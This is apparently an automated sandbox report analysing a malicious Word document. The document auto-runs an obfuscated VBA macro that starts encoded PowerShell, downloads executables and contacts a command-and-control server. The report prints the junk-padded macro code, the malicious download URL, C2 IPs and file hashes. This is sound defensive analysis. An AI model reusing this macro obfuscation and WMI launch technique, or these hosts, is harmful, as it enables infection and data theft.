RE_583658295301_1004.doc
This report is generated from a file or URL submitted to this webservice on October 4th 2019 20:51:42 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware: POSTs files to a webserver
- Persistence: Spawns a lot of processes
- Network Behavior: Contacts 1 domain and 1 host
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators: 13

External Systems
Sample was identified as malicious by a large number of Antivirus engines
- details: 13/59 Antivirus vendors marked sample as malicious (22% detection rate)
- source: External System
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details: 13/59 Antivirus vendors marked sample as malicious (22% detection rate)
- source: External System
- relevance: 8/10

General

Document spawns new processes
- details: Document spawned a new process (macro present)
- source: Indicator Combinations
- relevance: 7/10

GETs files from a webserver
- details:
  "GET /2tgmnk/fJZIPCYV/ HTTP/1.1
  Host: www.eteensblog.com
  Connection: Keep-Alive"
- source: Network Traffic
- relevance: 10/10

The analysis spawned a process that was identified as malicious
- details:
  13/69 Antivirus vendors marked spawned process "897.exe" (PID: 3536) as malicious (classified as "Packed-FVW" with 18% detection rate)
  13/69 Antivirus vendors marked spawned process "897.exe" (PID: 3372) as malicious (classified as "Packed-FVW" with 18% detection rate)
  13/69 Antivirus vendors marked spawned process "capprep.exe" (PID: 3396) as malicious (classified as "Packed-FVW" with 18% detection rate)
  13/69 Antivirus vendors marked spawned process "capprep.exe" (PID: 2400) as malicious (classified as "Packed-FVW" with 18% detection rate)
- source: Monitored Target
- relevance: 10/10

Installation/Persistence

Writes data to a remote process
- details:
  "powershell.exe" wrote 32 bytes to a remote process "%USERPROFILE%\897.exe" (Handle: 1644)
  "powershell.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
  "powershell.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
  "powershell.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
  "897.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
  "897.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
  "897.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
  "897.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
  "capprep.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
  "capprep.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
  "capprep.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
  "capprep.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
- source: API Call
- relevance: 6/10
- ATT&CK ID: T1055

Network Related

Malicious artifacts seen in the context of a contacted host
- details:
  Found malicious artifacts related to "146.82.206.253": ...
  URL: http://www.eteensblog.com/2tgmnk/fJZIPCYV/ (AV positives: 8/71 scanned on 10/04/2019 20:38:08)
  URL: http://www.eteensblog.com/2tgmnk/fJZIPCYV (AV positives: 6/72 scanned on 10/04/2019 18:15:12)
  URL: http://contactlenses.cc/ (AV positives: 2/70 scanned on 07/21/2019 05:51:05)
  URL: http://galleries10.exploitedteens.com/ (AV positives: 1/50 scanned on 11/07/2013 03:56:09)
  File SHA256: 4e2f067e6fba50b24d168515dce7f31da8bd4d3e9f93fa047d404878f338a710 (AV positives: 13/72 scanned on 10/04/2019 20:31:51)
  File SHA256: faabccb1ffe41bc64521776a9ce31eb61725beb8efaad424de61bc6aa432d09c (AV positives: 16/71 scanned on 10/04/2019 20:05:50)
  File SHA256: 3f1f8fd989386c1beddf6223113b18d788f4862325bfae0828080e29e067599b (AV positives: 17/72 scanned on 10/04/2019 18:20:20)
  File SHA256: a6e58fcdd3b8743865c45d8035bcca1f3ebfde77d9ff9139b5a379289a088cd7 (AV positives: 15/73 scanned on 10/04/2019 18:11:19)
- source: Network Traffic
- relevance: 10/10

Unusual Characteristics

Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details: Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source: Static Parser
- relevance: 10/10
- ATT&CK ID: T1137

Spawns a lot of processes
- details:
  Spawned process "WINWORD.EXE" with commandline "/n "C:\RE_583658295301_1004.doc""
  Spawned process "powershell.exe" with commandline "powershell -enco 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"
  Spawned process "897.exe"
  Spawned process "897.exe" with commandline "--caaf215f"
  Spawned process "capprep.exe"
  Spawned process "capprep.exe" with commandline "--83c0e935"
- source: Monitored Target
- relevance: 8/10

Hiding 4 Malicious Indicators

Suspicious Indicators: 22

Anti-Detection/Stealthiness
Contains ability to open/control a service
- details:
  OpenServiceW@ADVAPI32.DLL from 897.exe (PID: 3372) (3 calls)
  OpenServiceW@ADVAPI32.DLL from capprep.exe (PID: 2400) (3 calls)
- source: Hybrid Analysis Technology
- relevance: 8/10
- ATT&CK ID: T1035

Possibly tries to hide a process launching it with different user credentials
- details:
  CreateProcessAsUserW@ADVAPI32.DLL from 897.exe (PID: 3372)
  CreateProcessAsUserW@ADVAPI32.DLL from capprep.exe (PID: 2400)
- source: Hybrid Analysis Technology
- relevance: 3/10

Anti-Reverse Engineering

Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details:
  "powershell.exe" is allocating memory with PAGE_GUARD access rights
  "897.exe" is protecting 48760 bytes with PAGE_GUARD access rights
  "897.exe" is protecting 2862 bytes with PAGE_GUARD access rights
  "897.exe" is protecting 15072 bytes with PAGE_GUARD access rights
  "897.exe" is protecting 4 bytes with PAGE_GUARD access rights
  "897.exe" is protecting 1012 bytes with PAGE_GUARD access rights
  "capprep.exe" is protecting 48760 bytes with PAGE_GUARD access rights
  "capprep.exe" is protecting 2862 bytes with PAGE_GUARD access rights
- source: API Call
- relevance: 10/10

Environment Awareness

Contains ability to enumerate services
- details:
  EnumServicesStatusExW@ADVAPI32.DLL from 897.exe (PID: 3372)
  EnumServicesStatusExW@ADVAPI32.DLL from capprep.exe (PID: 2400)
- source: Hybrid Analysis Technology
- relevance: 7/10
- ATT&CK ID: T1120

Contains ability to query CPU information
- details:
  cpuid from 897.exe (PID: 3536)
  cpuid from 897.exe (PID: 3372)
  cpuid from capprep.exe (PID: 3396)
  cpuid from capprep.exe (PID: 2400)
- source: Hybrid Analysis Technology
- relevance: 10/10
- ATT&CK ID: T1082

General

POSTs files to a webserver
- details:
  "POST /dma/usbccid/sess/ HTTP/1.1
  Referer: http://172.105.11.15/dma/usbccid/sess/
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 172.105.11.15:8080
  Content-Length: 475
  Connection: Keep-Alive
  Cache-Control: no-cache" with no payload
- source: Network Traffic
- relevance: 5/10

The analysis extracted a file that was identified as malicious
- details: 13/69 Antivirus vendors marked dropped file "897.exe" as malicious (classified as "Packed-FVW" with 18% detection rate)
- source: Binary File
- relevance: 10/10

Installation/Persistence

Allocates virtual memory in a remote process
- details: "powershell.exe" allocated memory in "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap"
- source: API Call
- relevance: 7/10
- ATT&CK ID: T1055

Contains ability to download files from the internet
- details: InternetReadFile@WININET.DLL from capprep.exe (PID: 2400)
- source: Hybrid Analysis Technology
- relevance: 10/10

Creates new processes
- details:
  "897.exe" is creating a new process (Name: "%USERPROFILE%\897.exe", Handle: 364)
  "capprep.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\capprep.exe", Handle: 260)
- source: API Call
- relevance: 8/10

Opens the MountPointManager (often used to detect additional infection locations)
- details:
  "powershell.exe" opened "\Device\MountPointManager"
  "897.exe" opened "\Device\MountPointManager"
- source: API Call
- relevance: 5/10

Network Related

Found potential IP address in binary/memory
- details: "172.105.11.15"
- source: File/Memory
- relevance: 3/10

Sends traffic on typical HTTP outbound port, but without HTTP header
- details: TCP traffic to 146.82.206.253 on port 80 is sent without HTTP header
- source: Network Traffic
- relevance: 5/10

Uses a User Agent typical for browsers, although no browser was ever launched
- details: Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source: Network Traffic
- relevance: 10/10

Pattern Matching

Contains ability to download files from the internet
- details: InternetReadFile@WININET.DLL from capprep.exe (PID: 2400)
- source: Hybrid Analysis Technology
- relevance: 10/10

Spyware/Information Retrieval

Contains ability to enumerate processes/modules/threads
- details:
  CreateToolhelp32Snapshot@KERNEL32.DLL from 897.exe (PID: 3536)
  CreateToolhelp32Snapshot@KERNEL32.DLL from 897.exe (PID: 3372)
  CreateToolhelp32Snapshot@KERNEL32.DLL from capprep.exe (PID: 3396)
  CreateToolhelp32Snapshot@KERNEL32.DLL from capprep.exe (PID: 2400)
- source: Hybrid Analysis Technology
- relevance: 5/10
- ATT&CK ID: T1215

System Security

Modifies proxy settings
- details:
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "capprep.exe" (Access type: "SETVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  "capprep.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  "capprep.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1112

Unusual Characteristics

Contains ability to flush the cache line
- details: clflush byte ptr [FFFFFFFFC592F8FFh] from powershell.exe (PID: 2684)
- source: Hybrid Analysis Technology
- relevance: 10/10

Contains embedded VBA macros with suspicious keywords
- details:
  Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  Found suspicious keyword "Open" which indicates: "May open a file"
  Found suspicious keyword "VIRTUAL" which indicates: "May detect virtualization"
  Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "system" which indicates: "May run an executable file or a system command on a Mac (if combined with libc.dylib)"
  Found suspicious keyword "ShowWindow" which indicates: "May hide the application"
- source: Static Parser
- relevance: 10/10

Invokes a process with a very long commandline
- details: "powershell -enco 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" on 2019-10-4.22:53:14.617
- source: Monitored Target
- relevance: 10/10

Hiding 2 Suspicious Indicators

Informative: 25

Environment Awareness
Contains ability to query the machine version
- details:
  RtlGetVersion@NTDLL.DLL from 897.exe (PID: 3536)
  RtlGetVersion@NTDLL.DLL from 897.exe (PID: 3372)
  RtlGetVersion@NTDLL.DLL from capprep.exe (PID: 3396)
  RtlGetVersion@NTDLL.DLL from capprep.exe (PID: 2400)
- source: Hybrid Analysis Technology
- relevance: 1/10

Possibly tries to detect the presence of a debugger
- details:
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (4 calls)
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (4 calls)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (4 calls)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (4 calls)
- source: Hybrid Analysis Technology
- relevance: 1/10

General

Contacts domains
- details: "www.eteensblog.com"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details: "146.82.206.253:80"
- source: Network Traffic
- relevance: 1/10

Contains PDB pathways
- details: "powershell.pdb"
- source: File/Memory
- relevance: 1/10

Contains embedded VBA macros
- details:
File "virtualjnt.cls" (Streampath: "Macros/VBA/virtualjnt") has code: ""
File "bluezij.bas" (Streampath: "Macros/VBA/bluezij") has code: "Function Surinamenjp()
On Error Resume Next
'/Floridazun
'Lead 24/365 interfaces Uzbekistan action-items CSS Awesome Soft Table District facilitate violet
Azerbaijanian_Manatsjt = "Solutions Illinois solution Personal Loan Account Facilitator connect Illinois Practical Fresh Pants overriding backing up Factors"
'/Rieljfm
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'transform viral Wooden web-enabled Borders Incredible hacking national magnetic utilize Prairie Tools & Health
Savings_Accountjhd = Azerbaijanian_Manatsjt + CInt(256) 'Alabama Venezuela Views Generic Fresh Mouse Egypt IB Bedfordshire Games
'quantify bandwidth Unbranded Cotton Tuna Central bandwidth mobile Home Loan Account collaborative Turkmenistan Concrete
multibytecji = Azerbaijanian_Manatsjt + Len("402") 'Face to face Rustic Awesome Malawi Metal Tactics Personal Loan Account programming robust black
'Wooden Steel Pound Sterling demand-driven Incredible Granite Keyboard Sleek Plastic Table Supervisor neural Cotton
Directorfjt = Azerbaijanian_Manatsjt + CInt(475) 'scalable Sleek Plastic Chicken index Investment Account bus Wooden Small Granite Bacon end-to-end engineer Soft artificial intelligence
'Knoll National Implemented Handmade Soft Chair Dynamic Customer Reunion bandwidth channels communities
Driveswjq = Azerbaijanian_Manatsjt + Len("112") 'zero defect Wyoming Cambridgeshire Industrial & Tools black Plastic Fiji pink Iraqi Dinar leading-edge Intelligent Legacy
'alarm Small Plastic Computer Croatian Kuna Frozen compress AGP program
New_Yorkrfh = Azerbaijanian_Manatsjt + Len("538") 'Sleek Steel Tuna Dam Monitored Senior Argentina Corporate FTP Handmade Cotton
'Cambridgeshire Toys open-source Motorway Applications systems Steel Estates
bandwidthzia = Azerbaijanian_Manatsjt + CStr(Licensedhrw) 'dynamic Light Savings Account methodical withdrawal Brand
'Divide Rustic Plastic Fish Granite Brand invoice invoice Communications Fantastic hack budgetary management redundant Washington SAS sensor
Wend
'Regional impactful Licensed B2C Graphic Interface Senior
Sleekoqn = Brunei_Dollarhhi + "p" + Health__Toysfwz(virtualjnt.Toystcj + virtualjnt.parsingmls) 'Digitized payment wireless olive Ethiopia Auto Loan Account copy bricks-and-clicks Lakes FTP connect Incredible Metal Keyboard
'/structurebqj
'hacking reciprocal Fantastic white Investor reboot Wooden Checking Account Orchestrator sensor transmit Pine circuit New Mexico
Azerbaijanian_Manatsjt = "pricing structure Books & Baby backing up mindshare white Home Loan Account repurpose Quality needs-based Saudi Riyal Malawi"
'/synthesizingpui
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Florida streamline feed Intelligent Fresh Soap Corporate Investment Account RSS
Handcrafted_Soft_Balltjz = Azerbaijanian_Manatsjt + CInt(866) 'distributed deposit Manors overriding models Checking Account
'Auto Loan Account THX Networked optical responsive parallelism invoice
Awesome_Steel_Soapdik = Azerbaijanian_Manatsjt + Len("604") 'synergies Savings Account Awesome neural transform Movies Incredible Generic Steel Car Industrial & Clothing uniform Rubber
'Intelligent Granite Gloves Infrastructure Cliff generating orchid Intelligent online calculate Administrator Denar Wooden national withdrawal solutions
ebusinessivu = Azerbaijanian_Manatsjt + CInt(301) 'B2B Representative quantify synthesizing Handmade Checking Account Borders Isle Data generate Branding Assurance
'Global Fantastic Steel Ball Lead payment transitional Savings Account Bedfordshire invoice Illinois synthesize
Intelligent_Granite_Shoeslnw = Azerbaijanian_Manatsjt + Len("846") 'Awesome Metal Salad bus invoice whiteboard B2B Gorgeous Granite Table transmit generating
'ubiquitous internet solution transmitter knowledge user parsing Metal Implementation Berkshire deposit Alaska unleash salmon Inlet
strategizeitt = Azerbaijanian_Manatsjt + Len("450") 'Gorgeous Danish Krone lime initiatives embrace challenge Unbranded Granite Computer Fantastic New York next-generation back up calculate
'regional Persistent feed Markets protocol THX navigate product copying tan
Centralmlf = Azerbaijanian_Manatsjt + CStr(copybaz) 'Technician Bedfordshire Manat Books, Computers & Health withdrawal Mississippi Personal Loan Account index Ferry panel Flat
'Ports Incredible Rubber Chair applications national Glens Chief Quality Health & Kids Distributed azure invoice
Wend
'Tasty Rubber Gloves Object-based Ergonomic Concrete Keyboard generating communities Licensed Refined Fresh Pants Health, Outdoors & Electronics
Creekvak = auxiliaryfik 'cross-platform TCP Monitored multimedia parse Fords Architect Gorgeous quantifying neural methodologies Open-source web-readiness
Set Rustic_Concrete_Baconflz = CreateObject(Health__Toysfwz(Health__Toysfwz(CStr(199017 + 61 - 199017) + "6161616161616161616161winmgmt61616161s:Win32_616161616161Proce616161616161616161ss")))
Creekvak = Creekvak + Rustic_Concrete_Baconflz.Create((Sleekoqn), Runlzr, upwardtrendingjtc, quantifyingkkj)
'/mobilezvj
'value-added impactful tan Brunei Dollar SAS Ergonomic Frozen Chicken Walk withdrawal Home Loan Account violet primary mint green deposit
Azerbaijanian_Manatsjt = "cross-platform Hills Field Concrete utilisation parse Taiwan Freeway Licensed Bahamian Dollar Managed throughput"
'/Groupiuh
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Internal programming Expanded Avenue quantifying installation generate Buckinghamshire
Kids__Toyswjj = Azerbaijanian_Manatsjt + CInt(110) 'Maine payment Norfolk Island Sports Afghanistan convergence Tennessee streamline Jersey interface silver Fantastic Soft Keyboard COM Unbranded Concrete Ball
'Customer PNG Investment Account Streamlined Austria port Sleek Plastic Bacon District AI index seize Money Market Account generate
Sleek_Plastic_Shirtozp = Azerbaijanian_Manatsjt + Len("264") 'Soft calculate hack Ways Orchestrator partnerships cyan GB regional white bypassing Home Loan Account Beauty, Beauty & Electronics
'Avon migration feed compress Sleek Home, Sports & Home Electronics, Outdoors & Beauty yellow bypassing
compressinghzp = Azerbaijanian_Manatsjt + CInt(43) 'Norway Ergonomic Wooden Soap Investor Licensed Berkshire Practical Bedfordshire Fresh orange
'grey Indiana distributed multi-state Personal Loan Account Coordinator contingency Small Credit Card Account Sleek Lake online
Marketsbij = Azerbaijanian_Manatsjt + Len("657") 'cutting-edge Product Russian Ruble e-services Global Corporate Soft multi-byte global Executive primary
'Refined Cotton Table Mississippi synthesize application Arizona Applications invoice Usability
whitezfz = Azerbaijanian_Manatsjt + Len("23") 'Radial Buckinghamshire synergy Configuration connecting Incredible Cotton Chicken Algerian Dinar Argentine Peso
'Response Frozen Idaho back-end Checking Account copying Regional value-added Burundi Money Market Account
generatejwh = Azerbaijanian_Manatsjt + CStr(Graniteuwk) 'Minnesota Buckinghamshire Savings Account Iceland user-centric repurpose calculate Technician quantifying
'Concrete Officer success Kids & Shoes Administrator Awesome Rubber Pants
Wend
'Berkshire redundant encoding Riel 1080p Belize Dollar Indiana bandwidth Refined Steel Shirt niches Generic Metal Computer Auto Loan Account
End Function"
File "functionalitiestfi.bas" (Streampath: "Macros/VBA/functionalitiestfi") has code: "Function upwardtrendingjtc()
On Error Resume Next
'/fuchsiapnt
'withdrawal Trail Borders Finland Indiana Sports & Books calculating system Human Mali Gibraltar
Azerbaijanian_Manatsjt = "Plastic Kids & Music US Dollar Avon Incredible Granite Chair multi-byte"
'/Directorsrv
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Republic of Korea turn-key Functionality bricks-and-clicks ADP Checking Account
granularkvd = Azerbaijanian_Manatsjt + CInt(683) 'Grocery & Music back-end override Connecticut Comoro Franc Port Licensed Frozen Hat next generation Money Market Account streamline cyan
'applications Engineer Cape Verde Buckinghamshire scalable Personal Loan Account Greece modular Jewelery & Automotive Gorgeous Concrete Towels copy
Fullyconfigurableuzd = Azerbaijanian_Manatsjt + Len("658") 'Unbranded Cotton Chicken Outdoors & Automotive circuit black Home Loan Account Chief
'task-force red Grocery, Industrial & Home Specialist secured line Generic supply-chains Tasty Rubber Ball deposit 5th generation Pine strategize
Comoroslmz = Azerbaijanian_Manatsjt + CInt(777) 'input Visionary Frozen frame copy tan portals Kids Generic
'productivity connect Louisiana Home Loan Account programming Group proactive
Brandfdh = Azerbaijanian_Manatsjt + Len("296") 'Nebraska Automated open architecture Plastic Handmade Fresh Cheese Refined application violet Venezuela Generic Steel Gloves Kina Berkshire Lights solid state
'ADP IB back up groupware Vanuatu driver
onetooneihp = Azerbaijanian_Manatsjt + Len("922") 'Shoals regional impactful firewall Regional Agent West Virginia cross-platform ivory Investor Principal Dynamic
'Architect capability Ergonomic Cotton Computer Principal Palladium repurpose Generic Metal Ball Grocery & Automotive secured line payment Robust Ergonomic Wooden Tuna generating
Algerian_Dinarqmh = Azerbaijanian_Manatsjt + CStr(invoicedwf) 'optical Borders extend Accountability Planner fresh-thinking info-mediaries Euro Dynamic Division Assimilated Practical Granite Hat SMTP Licensed Fresh Car
'Soft Dynamic Ergonomic Fresh Bike Mauritius Assurance Indiana policy Licensed turquoise Iraqi Dinar unleash Kwanza
Wend
'Fresh Product overriding microchip intranet Missouri Soft
'/bypassingspp
'monitor Dynamic Practical Dynamic Decentralized Fords Islands unleash orchestrate Botswana Associate end-to-end
Azerbaijanian_Manatsjt = "application Industrial & Shoes Awesome Metal Shirt capacitor Rue deposit Fresh Run Norwegian Krone Inlet connecting Practical Frozen Chips calculating"
'/fullrangernv
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'bandwidth National Mountains Networked Strategist Hawaii
Handcraftedajv = Azerbaijanian_Manatsjt + CInt(663) 'Investment Account model Bedfordshire Executive Passage Connecticut Handcrafted Granite Table Shoals River Arizona Senegal cross-platform
'multi-byte deposit synthesize Fantastic Metal Shirt Open-source Assurance Computers, Sports & Music digital mobile solid state Integrated quantifying
empowerljo = Azerbaijanian_Manatsjt + Len("626") 'Unions South Georgia and the South Sandwich Islands Granite technologies next-generation SDD
'reboot Intelligent Steel Bacon International neural Solomon Islands Dollar Industrial Terrace
Centralwzu = Azerbaijanian_Manatsjt + CInt(496) 'tan contingency panel Buckinghamshire Turkish Lira Polarised synergy Clothing metrics generating navigating Bulgaria synthesizing
'Sharable mobile Sierra Leone Crescent front-end backing up wireless Berkshire
Intelligentbcd = Azerbaijanian_Manatsjt + Len("400") 'Movies, Beauty & Outdoors Sri Lanka Rupee portal Soft encompassing Licensed Refined end-to-end
'Human calculating 1080p wireless invoice streamline Rustic Granite Table backing up plug-and-play Guadeloupe Denmark integrate impactful
Credit_Card_Accountowf = Azerbaijanian_Manatsjt + Len("97") 'reciprocal microchip Berkshire Mississippi Tasty Plastic Cheese Small navigating streamline Cove quantifying
'Associate Massachusetts hard drive engage enterprise methodologies metrics Concrete Row Burg
Woodenpdp = Azerbaijanian_Manatsjt + CStr(Home_Loan_Accountnfr) 'systematic generate connecting Belarus copying Falls
'Communications wireless Checking Account UAE Dirham Awesome Home Loan Account
Wend
'evolve Villages circuit Trace South Dakota embrace zero tolerance Georgia Incredible Soft Chair concept Licensed Steel Table Mountain Automotive & Baby Ergonomic
Set upwardtrendingjtc = CreateObject(Unionclc + Health__Toysfwz(virtualjnt.Estateaah + valueaddedhos))
'/Smalllal
'ivory Intranet wireless HDD deposit Public-key e-commerce Lithuania Consultant quantifying mint green Licensed Fresh Pizza Viaduct
Azerbaijanian_Manatsjt = "parsing SMS Lead neural high-level Bangladesh Metal Virginia Isle Books
Beauty & Kids"
'/transmitteroaz
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Refined Rubber Chair Games, Baby & Automotive Unbranded feed incremental cross-platform wireless hybrid real-time Lesotho
hackingnaw = Azerbaijanian_Manatsjt + CInt(271) 'Savings Account tan quantifying National visualize FTP Consultant Wooden
'quantify Industrial quantifying Awesome Metal Keyboard end-to-end Frozen Ergonomic Maryland Walk Ergonomic Cotton Chair e-services Ports Berkshire Games & Clothing
convergencecom = Azerbaijanian_Manatsjt + Len("153") 'invoice interface connect Frozen tan Arkansas real-time open-source Knoll British Indian Ocean Territory (Chagos Archipelago) Investment Account Divide
'Montana Fantastic Wooden Bike Soft Cotton Fully-configurable back up Checking Account overriding
Dynamicbmm = Azerbaijanian_Manatsjt + CInt(474) 'Chief Berkshire Licensed AGP Communications Music mint green
'Tasty Concrete Shirt transmitter Identity parse EXE Berkshire
paymentvzs = Azerbaijanian_Manatsjt + Len("67") 'Spurs Glen incubate Credit Card Account violet Operative FTP
'Saint Barthelemy Incredible Rustic Rubber Chair visualize Practical Infrastructure Jordanian Dinar
Genericivj = Azerbaijanian_Manatsjt + Len("599") 'Focused extend South Africa Shoal pixel Minnesota transmit Intelligent Frozen Tuna backing up
'COM Island navigating mindshare lavender Checking Account Assistant User-centric Ergonomic Soft Chicken Incredible Rubber Table Drive intermediate Tunisia
Handcrafted_Concrete_Chairzdj = Azerbaijanian_Manatsjt + CStr(implementkil) 'Bedfordshire Qatari Rial Norfolk Island backing up Security applications Pennsylvania Architect Walk
'Fields Sports, Games & Outdoors Wyoming Baby, Games & Outdoors Extended Bedfordshire harness knowledge base Rustic Metal encoding transmit Avon Dalasi
Wend
'Paradigm HDD Martinique parse invoice Focused Designer
'/streamlineili
'Money Market Account neutral Rustic deposit Fresh bandwidth HDD hack Palestinian Territory Configuration Chief e-business
Azerbaijanian_Manatsjt = "neural Kentucky AGP Internal application withdrawal Rhode Island Kids & Automotive silver navigating Costa Rican Colon tan intranet leading-edge"
'/Spurssrz
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Credit Card Account PCI Product Louisiana Refined Frozen Salad transform Product Shores withdrawal Vision-oriented system Fantastic Wooden Shirt Cotton
JBODpzv = Azerbaijanian_Manatsjt + CInt(41) 'Identity Borders Tasty Rubber Mouse USB Jewelery clicks-and-mortar Lead Forks Chief Utah Agent Personal Loan Account Bedfordshire Cameroon
'teal reboot Lane matrix Dynamic e-business Identity Integration
hackkkm = Azerbaijanian_Manatsjt + Len("716") 'technologies Cotton Connecticut Multi-channelled convergence Romania Azerbaijan Fresh distributed bypassing Tools & Health mission-critical 24/7
'Norfolk Island Communications Markets Aruba Rustic Rubber Car Specialist Avon Lead Trace Lebanon Louisiana Timor-Leste Versatile Movies & Automotive
Savings_Accountkid = Azerbaijanian_Manatsjt + CInt(397) 'parse Mobility Vermont back-end California program Consultant Handcrafted Response Freeway Sleek Metal Chair
'Rubber Small Awesome Steel Hat Generic Plastic Chair scale Alabama orange magnetic card enterprise haptic Movies, Jewelery & Jewelery database Investor
USBwdb = Azerbaijanian_Manatsjt + Len("94") 'Assistant matrix Associate Decentralized interactive Incredible Concrete Cheese Arizona GB
'directional open-source 24/7 Home Loan Account implementation Synchronised Consultant Creek Hawaii
programazk = Azerbaijanian_Manatsjt + Len("448") 'Berkshire 24/365 Chad Shoes Sharable Analyst reboot Tasty Metal Bacon
'connect Ghana Shores reboot Macedonia strategy Intelligent
ivoryzwc = Azerbaijanian_Manatsjt + CStr(impactfulrft) 'engage Slovakia (Slovak Republic) PNG Savings Account Sleek Cotton Fish holistic Cambridgeshire 1080p
'virtual 1080p Solutions THX compress Saint Helena Hills application Wooden action-items Fresh sky blue web-readiness Legacy
Wend
'users interfaces firewall Licensed e-commerce Home Loan Account Future
upwardtrendingjtc.ShowWindow = wdTextureNone
'/Small_Metal_Hatahl
'Clothing & Home Industrial Texas internet solution Prairie Direct disintermediate Research Intelligent Frozen Bacon Program Functionality Coordinator Borders
Azerbaijanian_Manatsjt = "ADP SCSI synthesizing Steel 1080p JSON Steel"
'/zero_defectilv
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'systemic Handcrafted Wooden Gloves Yen back up Awesome Soft Ball Licensed Garden calculate Movies, Home & Health azure Graphic Interface proactive circuit bypass
Mandatoryjnk = Azerbaijanian_Manatsjt + CInt(607) 'Plastic clear-thinking indexing invoice compressing Automotive, Books & Shoes Kwacha dynamic Business-focused
'Fantastic deposit bypass repurpose Assistant XML Clothing, Automotive & Electronics Directives recontextualize
Cottonnda = Azerbaijanian_Manatsjt + Len("954") 'Advanced Island Baby Investment Account syndicate American Samoa Toys, Books & Movies empower Refined Creek
'synergy analyzer navigate architect SDD PCI Seamless transmit
Crossgroupidc = Azerbaijanian_Manatsjt + CInt(311) 'protocol Berkshire recontextualize Developer card cyan bypass Regional Kansas Ergonomic Frozen Soap RAM Baby Marketing Islands
'Focused New Hampshire Books & Shoes plug-and-play Money Market Account Drives Berkshire digital Buckinghamshire Legacy
Rupiahcat = Azerbaijanian_Manatsjt + Len("426") 'invoice Concrete magnetic Incredible Sleek Wooden Chips Intranet sky blue TCP Mexico panel empower web services Syrian Arab Republic synthesizing
'Turkish Lira Berkshire Auto Loan Account Square Planner invoice SDD Sleek Concrete Salad Extended grid-enabled empowering
Incredible_Concrete_Chipslbj = Azerbaijanian_Manatsjt + Len("964") 'Grocery & Jewelery redundant Dynamic Bedfordshire copying Berkshire Architect Ergonomic Steel Sausages Legacy directional Frozen
'pixel payment Bedfordshire Burundi Avon extensible Orchestrator withdrawal Borders solution-oriented Consultant Legacy mint green
hackingtto = Azerbaijanian_Manatsjt + CStr(worldclassbhi) 'e-services Glen Decentralized CFA Franc BEAC withdrawal Washington quantify cross-platform Facilitator Cotton Cotton grid-enabled
'multi-state Automotive Quality PCI service-desk lime fuchsia Tasty Wooden Sausages e-enable Texas deposit Auto Loan Account Generic Soft Car Associate
Wend
